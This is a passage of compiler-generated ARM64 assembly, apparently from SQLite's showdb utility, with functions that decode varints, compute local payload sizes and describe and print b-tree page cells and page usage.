adrp x8, l_.str.70@PAGE
add x8, x8, l_.str.70@PAGEOFF
stur x8, [x29, #-40]
b LBB15_9
LBB15_6:
adrp x8, l_.str.71@PAGE
add x8, x8, l_.str.71@PAGEOFF
stur x8, [x29, #-40]
b LBB15_9
LBB15_7:
adrp x8, l_.str.72@PAGE
add x8, x8, l_.str.72@PAGEOFF
stur x8, [x29, #-40]
b LBB15_9
LBB15_8:
adrp x8, l_.str.73@PAGE
add x8, x8, l_.str.73@PAGEOFF
stur x8, [x29, #-40]
b LBB15_9
LBB15_9:
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB15_11
b LBB15_10
LBB15_10:
ldur w0, [x29, #-4]
ldur x12, [x29, #-40]
ldur x11, [x29, #-24]
ldur w8, [x29, #-12]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x12, [x9]
str x11, [x9, #8]
str x10, [x9, #16]
str x8, [x9, #24]
adrp x1, l_.str.74@PAGE
add x1, x1, l_.str.74@PAGEOFF
bl _page_usage_msg
b LBB15_12
LBB15_11:
ldur w0, [x29, #-4]
ldur x10, [x29, #-40]
ldur x8, [x29, #-24]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.75@PAGE
add x1, x1, l_.str.75@PAGEOFF
bl _page_usage_msg
b LBB15_12
LBB15_12:
ldur x8, [x29, #-32]
ldur w9, [x29, #-52]
add w9, w9, #3
ldrb w9, [x8, w9, sxtw]
ldur x8, [x29, #-32]
ldur w10, [x29, #-52]
add w10, w10, #4
ldrb w8, [x8, w10, sxtw]
add w8, w8, w9, lsl #8
stur w8, [x29, #-44]
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB15_14
b LBB15_13
LBB15_13:
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB15_19
b LBB15_14
LBB15_14:
ldur w8, [x29, #-52]
add w8, w8, #12
str w8, [sp, #56]
stur wzr, [x29, #-48]
b LBB15_15
LBB15_15: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-48]
ldur w9, [x29, #-44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB15_18
b LBB15_16
LBB15_16: ; in Loop: Header=BB15_15 Depth=1
ldr w8, [sp, #56]
ldur w9, [x29, #-48]
add w8, w8, w9, lsl #1
str w8, [sp, #48]
ldur x8, [x29, #-32]
ldrsw x9, [sp, #48]
ldrb w9, [x8, x9]
ldur x8, [x29, #-32]
ldr w10, [sp, #48]
add w10, w10, #1
ldrb w8, [x8, w10, sxtw]
add w8, w8, w9, lsl #8
str w8, [sp, #48]
ldur x8, [x29, #-32]
ldrsw x9, [sp, #48]
add x0, x8, x9
bl _decodeInt32
str w0, [sp, #52]
ldr w0, [sp, #52]
ldur w1, [x29, #-4]
ldur w2, [x29, #-48]
ldur x3, [x29, #-24]
bl _page_usage_btree
b LBB15_17
LBB15_17: ; in Loop: Header=BB15_15 Depth=1
ldur w8, [x29, #-48]
add w8, w8, #1
stur w8, [x29, #-48]
b LBB15_15
LBB15_18:
ldur x8, [x29, #-32]
ldrsw x9, [sp, #56]
add x8, x8, x9
subs x0, x8, #4
bl _decodeInt32
str w0, [sp, #52]
ldr w0, [sp, #52]
ldur w1, [x29, #-4]
ldur w2, [x29, #-48]
ldur x3, [x29, #-24]
bl _page_usage_btree
b LBB15_19
LBB15_19:
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB15_22
b LBB15_20
LBB15_20:
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #10
cset w8, eq
tbnz w8, #0, LBB15_22
b LBB15_21
LBB15_21:
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB15_27
b LBB15_22
LBB15_22:
ldur w8, [x29, #-52]
add w8, w8, #8
ldur x9, [x29, #-32]
ldursw x10, [x29, #-52]
ldrb w9, [x9, x10]
subs w9, w9, #5
cset w9, le
and w10, w9, #0x1
mov w9, #4
mul w9, w9, w10
add w8, w8, w9
str w8, [sp, #44]
stur wzr, [x29, #-48]
b LBB15_23
LBB15_23: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-48]
ldur w9, [x29, #-44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB15_26
b LBB15_24
LBB15_24: ; in Loop: Header=BB15_23 Depth=1
ldr w8, [sp, #44]
ldur w9, [x29, #-48]
add w8, w8, w9, lsl #1
str w8, [sp, #40]
ldur x8, [x29, #-32]
ldrsw x9, [sp, #40]
ldrb w9, [x8, x9]
ldur x8, [x29, #-32]
ldr w10, [sp, #40]
add w10, w10, #1
ldrb w8, [x8, w10, sxtw]
add w8, w8, w9, lsl #8
str w8, [sp, #40]
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w0, [x8, x9]
ldur x8, [x29, #-32]
ldrsw x9, [sp, #40]
add x1, x8, x9
ldur w2, [x29, #-4]
ldur w3, [x29, #-48]
bl _page_usage_cell
b LBB15_25
LBB15_25: ; in Loop: Header=BB15_23 Depth=1
ldur w8, [x29, #-48]
add w8, w8, #1
stur w8, [x29, #-48]
b LBB15_23
LBB15_26:
b LBB15_27
LBB15_27:
ldur x0, [x29, #-32]
bl _free
b LBB15_28
LBB15_28:
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
.p2align 2
lJTI15_0:
.long LBB15_5-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_6-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_7-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_9-Ltmp3
.long LBB15_8-Ltmp3
; -- End function
.p2align 2 ; -- Begin function page_usage_msg
_page_usage_msg: ; @page_usage_msg
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur x1, [x29, #-16]
sub x9, x29, #24
add x8, x29, #16
str x8, [x9]
ldur x0, [x29, #-16]
ldur x1, [x29, #-24]
bl _sqlite3_vmprintf
str x0, [sp, #32]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB16_2
b LBB16_1
LBB16_1:
ldur w8, [x29, #-4]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB16_3
b LBB16_2
LBB16_2:
ldur w8, [x29, #-4]
; implicit-def: $x11
mov x11, x8
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #32]
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.64@PAGE
add x0, x0, l_.str.64@PAGEOFF
bl _printf
ldr x0, [sp, #32]
bl _sqlite3_free
b LBB16_6
LBB16_3:
adrp x8, _zPageUse@PAGE
ldr x8, [x8, _zPageUse@PAGEOFF]
ldursw x9, [x29, #-4]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB16_5
b LBB16_4
LBB16_4:
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.65@PAGE
add x0, x0, l_.str.65@PAGEOFF
bl _printf
adrp x8, _zPageUse@PAGE
str x8, [sp, #24] ; 8-byte Folded Spill
ldr x8, [x8, _zPageUse@PAGEOFF]
ldursw x9, [x29, #-4]
ldr x8, [x8, x9, lsl #3]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.66@PAGE
add x0, x0, l_.str.66@PAGEOFF
bl _printf
ldr x8, [sp, #32]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.67@PAGE
add x0, x0, l_.str.67@PAGEOFF
bl _printf
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x8, [x8, _zPageUse@PAGEOFF]
ldursw x9, [x29, #-4]
ldr x0, [x8, x9, lsl #3]
bl _sqlite3_free
b LBB16_5
LBB16_5:
ldr x8, [sp, #32]
adrp x9, _zPageUse@PAGE
ldr x9, [x9, _zPageUse@PAGEOFF]
ldursw x10, [x29, #-4]
str x8, [x9, x10, lsl #3]
b LBB16_6
LBB16_6:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function page_usage_cell
_page_usage_cell: ; @page_usage_cell
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturb w0, [x29, #-1]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
stur w3, [x29, #-24]
stur wzr, [x29, #-32]
stur wzr, [x29, #-28]
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, gt
tbnz w8, #0, LBB17_2
b LBB17_1
LBB17_1:
ldur x8, [x29, #-16]
add x8, x8, #4
stur x8, [x29, #-16]
ldur w8, [x29, #-32]
add w8, w8, #4
stur w8, [x29, #-32]
b LBB17_2
LBB17_2:
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB17_4
b LBB17_3
LBB17_3:
ldur x0, [x29, #-16]
sub x1, x29, #40
bl _decodeVarint
stur w0, [x29, #-28]
ldursw x9, [x29, #-28]
ldur x8, [x29, #-16]
add x8, x8, x9
stur x8, [x29, #-16]
ldur w9, [x29, #-28]
ldur w8, [x29, #-32]
add w8, w8, w9
stur w8, [x29, #-32]
ldur x0, [x29, #-40]
ldursb w1, [x29, #-1]
bl _localPayload
str x0, [sp, #40]
b LBB17_5
LBB17_4:
str xzr, [sp, #40]
stur xzr, [x29, #-40]
b LBB17_5
LBB17_5:
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB17_7
b LBB17_6
LBB17_6:
ldurb w8, [x29, #-1]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB17_8
b LBB17_7
LBB17_7:
ldur x0, [x29, #-16]
add x1, sp, #48
bl _decodeVarint
stur w0, [x29, #-28]
ldursw x9, [x29, #-28]
ldur x8, [x29, #-16]
add x8, x8, x9
stur x8, [x29, #-16]
ldur w9, [x29, #-28]
ldur w8, [x29, #-32]
add w8, w8, w9
stur w8, [x29, #-32]
b LBB17_8
LBB17_8:
ldr x8, [sp, #40]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB17_15
b LBB17_9
LBB17_9:
ldur x8, [x29, #-16]
ldr x9, [sp, #40]
add x0, x8, x9
bl _decodeInt32
str w0, [sp, #36]
str wzr, [sp, #32]
b LBB17_10
LBB17_10: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #36]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB17_12
b LBB17_11
LBB17_11: ; in Loop: Header=BB17_10 Depth=1
ldr w8, [sp, #32]
add w9, w8, #1
str w9, [sp, #32]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, lt
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB17_12
LBB17_12: ; in Loop: Header=BB17_10 Depth=1
ldr w8, [sp, #28] ; 4-byte Folded Reload
tbz w8, #0, LBB17_14
b LBB17_13
LBB17_13: ; in Loop: Header=BB17_10 Depth=1
ldr w0, [sp, #36]
ldr w8, [sp, #32]
; implicit-def: $x11
mov x11, x8
ldur w8, [x29, #-24]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x1, l_.str.76@PAGE
add x1, x1, l_.str.76@PAGEOFF
bl _page_usage_msg
ldr w8, [sp, #36]
subs w8, w8, #1
adrp x9, _pagesize@PAGE
ldr w9, [x9, _pagesize@PAGEOFF]
mul w0, w8, w9
mov w1, #4
bl _getContent
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _decodeInt32
str w0, [sp, #36]
ldur x0, [x29, #-16]
bl _free
b LBB17_10
LBB17_14:
b LBB17_15
LBB17_15:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function decodeVarint
_decodeVarint: ; @decodeVarint
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #32]
str x1, [sp, #24]
str xzr, [sp, #16]
str wzr, [sp, #12]
b LBB18_1
LBB18_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
subs w8, w8, #8
cset w8, ge
tbnz w8, #0, LBB18_6
b LBB18_2
LBB18_2: ; in Loop: Header=BB18_1 Depth=1
ldr x8, [sp, #16]
lsl x8, x8, #7
ldr x9, [sp, #32]
ldrsw x10, [sp, #12]
ldrb w9, [x9, x10]
and w9, w9, #0x7f
add x8, x8, w9, sxtw
str x8, [sp, #16]
ldr x8, [sp, #32]
ldrsw x9, [sp, #12]
ldrb w8, [x8, x9]
ands w8, w8, #0x80
cset w8, ne
tbnz w8, #0, LBB18_4
b LBB18_3
LBB18_3:
ldr x8, [sp, #16]
ldr x9, [sp, #24]
str x8, [x9]
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #44]
b LBB18_7
LBB18_4: ; in Loop: Header=BB18_1 Depth=1
b LBB18_5
LBB18_5: ; in Loop: Header=BB18_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB18_1
LBB18_6:
ldr x8, [sp, #16]
lsl x8, x8, #8
ldr x9, [sp, #32]
ldrsw x10, [sp, #12]
ldrb w9, [x9, x10]
add x8, x8, w9, sxtw
str x8, [sp, #16]
ldr x8, [sp, #16]
ldr x9, [sp, #24]
str x8, [x9]
mov w8, #9
str w8, [sp, #44]
b LBB18_7
LBB18_7:
ldr w0, [sp, #44]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function localPayload
_localPayload: ; @localPayload
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
strb w1, [sp, #39]
ldrsb w8, [sp, #39]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB19_2
b LBB19_1
LBB19_1:
adrp x8, _pagesize@PAGE
ldr w9, [x8, _pagesize@PAGEOFF]
subs w10, w9, #35
; implicit-def: $x9
mov x9, x10
sxtw x9, w9
str x9, [sp, #24]
ldr w8, [x8, _pagesize@PAGEOFF]
subs w8, w8, #12
lsl w8, w8, #5
mov w9, #255
sdiv w8, w8, w9
subs w9, w8, #23
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
str x8, [sp, #16]
b LBB19_3
LBB19_2:
adrp x8, _pagesize@PAGE
ldr w9, [x8, _pagesize@PAGEOFF]
subs w9, w9, #12
lsl w10, w9, #6
mov w9, #255
sdiv w10, w10, w9
subs w11, w10, #23
; implicit-def: $x10
mov x10, x11
sxtw x10, w10
str x10, [sp, #24]
ldr w8, [x8, _pagesize@PAGEOFF]
subs w8, w8, #12
lsl w8, w8, #5
sdiv w8, w8, w9
subs w9, w8, #23
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
str x8, [sp, #16]
b LBB19_3
LBB19_3:
ldr x8, [sp, #40]
ldr x9, [sp, #24]
subs x8, x8, x9
cset w8, le
tbnz w8, #0, LBB19_8
b LBB19_4
LBB19_4:
ldr x8, [sp, #16]
ldr x9, [sp, #40]
ldr x10, [sp, #16]
subs x9, x9, x10
adrp x10, _pagesize@PAGE
ldr w10, [x10, _pagesize@PAGEOFF]
subs w11, w10, #4
; implicit-def: $x10
mov x10, x11
sxtw x11, w10
sdiv x10, x9, x11
mul x10, x10, x11
subs x9, x9, x10
add x8, x8, x9
str x8, [sp, #8]
ldr x8, [sp, #8]
ldr x9, [sp, #24]
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB19_6
b LBB19_5
LBB19_5:
ldr x8, [sp, #8]
str x8, [sp]
b LBB19_7
LBB19_6:
ldr x8, [sp, #16]
str x8, [sp]
b LBB19_7
LBB19_7:
b LBB19_9
LBB19_8:
ldr x8, [sp, #40]
str x8, [sp]
b LBB19_9
LBB19_9:
ldr x0, [sp]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function describeCell
_describeCell: ; @describeCell
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturb w0, [x29, #-1]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
stur x3, [x29, #-32]
stur xzr, [x29, #-48]
stur wzr, [x29, #-52]
stur wzr, [x29, #-36]
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, gt
tbnz w8, #0, LBB20_2
b LBB20_1
LBB20_1:
ldur x8, [x29, #-16]
ldrb w9, [x8]
ldur x8, [x29, #-16]
ldrb w8, [x8, #1]
add w9, w8, w9, lsl #8
ldur x8, [x29, #-16]
ldrb w8, [x8, #2]
add w9, w8, w9, lsl #8
ldur x8, [x29, #-16]
ldrb w8, [x8, #3]
add w8, w8, w9, lsl #8
stur w8, [x29, #-56]
ldur x8, [x29, #-16]
add x8, x8, #4
stur x8, [x29, #-16]
ldur w8, [x29, #-52]
add w8, w8, #4
stur w8, [x29, #-52]
ldur w9, [x29, #-56]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, _describeCell.zDesc@PAGE
add x0, x0, _describeCell.zDesc@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
mov w1, #0
mov x2, #1000
adrp x3, l_.str.103@PAGE
add x3, x3, l_.str.103@PAGEOFF
bl ___sprintf_chk
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _strlen
stur x0, [x29, #-48]
b LBB20_2
LBB20_2:
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB20_4
b LBB20_3
LBB20_3:
ldur x0, [x29, #-16]
sub x1, x29, #64
bl _decodeVarint
stur w0, [x29, #-36]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-16]
add x8, x8, x9
stur x8, [x29, #-16]
ldur w9, [x29, #-36]
ldur w8, [x29, #-52]
add w8, w8, w9
stur w8, [x29, #-52]
ldur x9, [x29, #-48]
adrp x8, _describeCell.zDesc@PAGE
add x8, x8, _describeCell.zDesc@PAGEOFF
str x8, [sp, #32] ; 8-byte Folded Spill
add x0, x8, x9
ldur x8, [x29, #-64]
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.104@PAGE
add x3, x3, l_.str.104@PAGEOFF
bl ___sprintf_chk
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldur x9, [x29, #-48]
add x0, x8, x9
bl _strlen
ldur x8, [x29, #-48]
add x8, x8, x0
stur x8, [x29, #-48]
ldur x0, [x29, #-64]
ldursb w1, [x29, #-1]
bl _localPayload
str x0, [sp, #64]
b LBB20_5
LBB20_4:
str xzr, [sp, #64]
stur xzr, [x29, #-64]
b LBB20_5
LBB20_5:
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB20_7
b LBB20_6
LBB20_6:
ldurb w8, [x29, #-1]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB20_8
b LBB20_7
LBB20_7:
ldur x0, [x29, #-16]
add x1, sp, #72
bl _decodeVarint
stur w0, [x29, #-36]
ldursw x9, [x29, #-36]
ldur x8, [x29, #-16]
add x8, x8, x9
stur x8, [x29, #-16]
ldur w9, [x29, #-36]
ldur w8, [x29, #-52]
add w8, w8, w9
stur w8, [x29, #-52]
ldur x9, [x29, #-48]
adrp x8, _describeCell.zDesc@PAGE
add x8, x8, _describeCell.zDesc@PAGEOFF
str x8, [sp, #24] ; 8-byte Folded Spill
add x0, x8, x9
ldr x8, [sp, #72]
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.105@PAGE
add x3, x3, l_.str.105@PAGEOFF
bl ___sprintf_chk
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur x9, [x29, #-48]
add x0, x8, x9
bl _strlen
ldur x8, [x29, #-48]
add x8, x8, x0
stur x8, [x29, #-48]
b LBB20_8
LBB20_8:
ldr x8, [sp, #64]
ldur x9, [x29, #-64]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB20_10
b LBB20_9
LBB20_9:
ldur x8, [x29, #-16]
ldr x9, [sp, #64]
add x8, x8, x9
str x8, [sp, #48]
ldr x8, [sp, #48]
ldrb w9, [x8]
ldr x8, [sp, #48]
ldrb w8, [x8, #1]
add w9, w8, w9, lsl #8
ldr x8, [sp, #48]
ldrb w8, [x8, #2]
add w9, w8, w9, lsl #8
ldr x8, [sp, #48]
ldrb w8, [x8, #3]
add w8, w8, w9, lsl #8
str w8, [sp, #60]
ldur x9, [x29, #-48]
adrp x8, _describeCell.zDesc@PAGE
add x8, x8, _describeCell.zDesc@PAGEOFF
str x8, [sp, #16] ; 8-byte Folded Spill
add x0, x8, x9
ldr w9, [sp, #60]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.106@PAGE
add x3, x3, l_.str.106@PAGEOFF
bl ___sprintf_chk
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldur x9, [x29, #-48]
add x0, x8, x9
bl _strlen
ldur x8, [x29, #-48]
add x8, x8, x0
stur x8, [x29, #-48]
ldur w8, [x29, #-52]
add w8, w8, #4
stur w8, [x29, #-52]
b LBB20_10
LBB20_10:
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB20_13
b LBB20_11
LBB20_11:
ldurb w8, [x29, #-1]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB20_13
b LBB20_12
LBB20_12:
ldur x0, [x29, #-16]
ldr x1, [sp, #64]
ldur x8, [x29, #-48]
subs x9, x8, #1
adrp x8, _describeCell.zDesc@PAGE
add x8, x8, _describeCell.zDesc@PAGEOFF
add x2, x8, x9
bl _describeContent
ldur x8, [x29, #-48]
add x8, x8, x0
stur x8, [x29, #-48]
b LBB20_13
LBB20_13:
ldur x9, [x29, #-32]
adrp x8, _describeCell.zDesc@PAGE
add x8, x8, _describeCell.zDesc@PAGEOFF
str x8, [x9]
ldr x8, [sp, #64]
ldursw x9, [x29, #-52]
add x0, x8, x9
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function decodeCell
_decodeCell: ; @decodeCell
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
mov w9, #24304
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
sub sp, sp, #5, lsl #12 ; =20480
sub sp, sp, #3824
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #224]
str w1, [sp, #220]
str w2, [sp, #216]
str w3, [sp, #212]
str w4, [sp, #208]
ldr x8, [sp, #224]
ldrsw x9, [sp, #208]
add x8, x8, x9
str x8, [sp, #136]
ldr x8, [sp, #224]
ldrb w8, [x8]
strb w8, [sp, #127]
str wzr, [sp, #120]
ldr w9, [sp, #216]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.114@PAGE
add x0, x0, l_.str.114@PAGEOFF
bl _printf
ldrb w8, [sp, #127]
subs w8, w8, #5
cset w8, gt
tbnz w8, #0, LBB21_2
b LBB21_1
LBB21_1:
ldr x8, [sp, #136]
ldrb w9, [x8]
ldr x8, [sp, #136]
ldrb w8, [x8, #1]
add w9, w8, w9, lsl #8
ldr x8, [sp, #136]
ldrb w8, [x8, #2]
add w9, w8, w9, lsl #8
ldr x8, [sp, #136]
ldrb w8, [x8, #3]
add w8, w8, w9, lsl #8
str w8, [sp, #196]
ldr x0, [sp, #224]
ldr x1, [sp, #136]
mov w2, #4
bl _printBytes
ldr w9, [sp, #196]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.115@PAGE
add x0, x0, l_.str.115@PAGEOFF
bl _printf
ldr x8, [sp, #136]
add x8, x8, #4
str x8, [sp, #136]
b LBB21_2
LBB21_2:
ldrb w8, [sp, #127]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB21_7
b LBB21_3
LBB21_3:
ldr x0, [sp, #136]
add x1, sp, #176
bl _decodeVarint
str w0, [sp, #204]
ldr x0, [sp, #224]
ldr x1, [sp, #136]
ldr w2, [sp, #204]
bl _printBytes
ldr x0, [sp, #176]
ldrsb w1, [sp, #127]
bl _localPayload
str x0, [sp, #144]
ldr x8, [sp, #144]
ldr x9, [sp, #176]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB21_5
b LBB21_4
LBB21_4:
ldr x8, [sp, #176]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.116@PAGE
add x0, x0, l_.str.116@PAGEOFF
bl _printf
b LBB21_6
LBB21_5:
ldr x11, [sp, #176]
ldr x10, [sp, #144]
ldr x8, [sp, #176]
ldr x9, [sp, #144]
subs x8, x8, x9
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.117@PAGE
add x0, x0, l_.str.117@PAGEOFF
bl _printf
b LBB21_6
LBB21_6:
ldrsw x9, [sp, #204]
ldr x8, [sp, #136]
add x8, x8, x9
str x8, [sp, #136]
b LBB21_8
LBB21_7:
str xzr, [sp, #144]
str xzr, [sp, #176]
b LBB21_8
LBB21_8:
ldr x8, [sp, #136]
ldr x9, [sp, #144]
add x8, x8, x9
str x8, [sp, #128]
ldrb w8, [sp, #127]
subs w8, w8, #5
cset w8, eq
tbnz w8, #0, LBB21_10
b LBB21_9
LBB21_9:
ldrb w8, [sp, #127]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB21_11
b LBB21_10
LBB21_10:
ldr x0, [sp, #136]
add x1, sp, #168
bl _decodeVarint
str w0, [sp, #204]
ldr x0, [sp, #224]
ldr x1, [sp, #136]
ldr w2, [sp, #204]
bl _printBytes
ldr x8, [sp, #168]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.118@PAGE
add x0, x0, l_.str.118@PAGEOFF
bl _printf
ldrsw x9, [sp, #204]
ldr x8, [sp, #136]
add x8, x8, x9
str x8, [sp, #136]
b LBB21_11
LBB21_11:
ldr x8, [sp, #144]
subs x8, x8, #0
cset w8, le
tbnz w8, #0, LBB21_71
b LBB21_12
LBB21_12:
ldr x0, [sp, #136]
add x1, sp, #160
bl _decodeVarint
str w0, [sp, #204]
ldr x0, [sp, #224]
ldr x1, [sp, #136]
ldr w2, [sp, #204]
bl _printBytes
ldr x8, [sp, #160]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.119@PAGE
add x0, x0, l_.str.119@PAGEOFF
bl _printf
ldr w8, [sp, #204]
str w8, [sp, #200]
str wzr, [sp, #120]
ldr x8, [sp, #160]
str x8, [sp, #184]
b LBB21_13
LBB21_13: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #136]
ldrsw x9, [sp, #200]
add x8, x8, x9
ldr x9, [sp, #128]
subs x8, x8, x9
cset w8, hs
mov w9, #0
str w9, [sp, #68] ; 4-byte Folded Spill
tbnz w8, #0, LBB21_15
b LBB21_14
LBB21_14: ; in Loop: Header=BB21_13 Depth=1
ldrsw x8, [sp, #200]
ldr x9, [sp, #160]
subs x8, x8, x9
cset w8, lt
str w8, [sp, #68] ; 4-byte Folded Spill
b LBB21_15
LBB21_15: ; in Loop: Header=BB21_13 Depth=1
ldr w8, [sp, #68] ; 4-byte Folded Reload
tbz w8, #0, LBB21_31
b LBB21_16
LBB21_16: ; in Loop: Header=BB21_13 Depth=1
str wzr, [sp, #108]
ldr x8, [sp, #136]
ldrsw x9, [sp, #200]
add x0, x8, x9
add x1, sp, #152
bl _decodeVarint
str w0, [sp, #204]
ldr x0, [sp, #224]
ldr x8, [sp, #136]
ldrsw x9, [sp, #200]
add x1, x8, x9
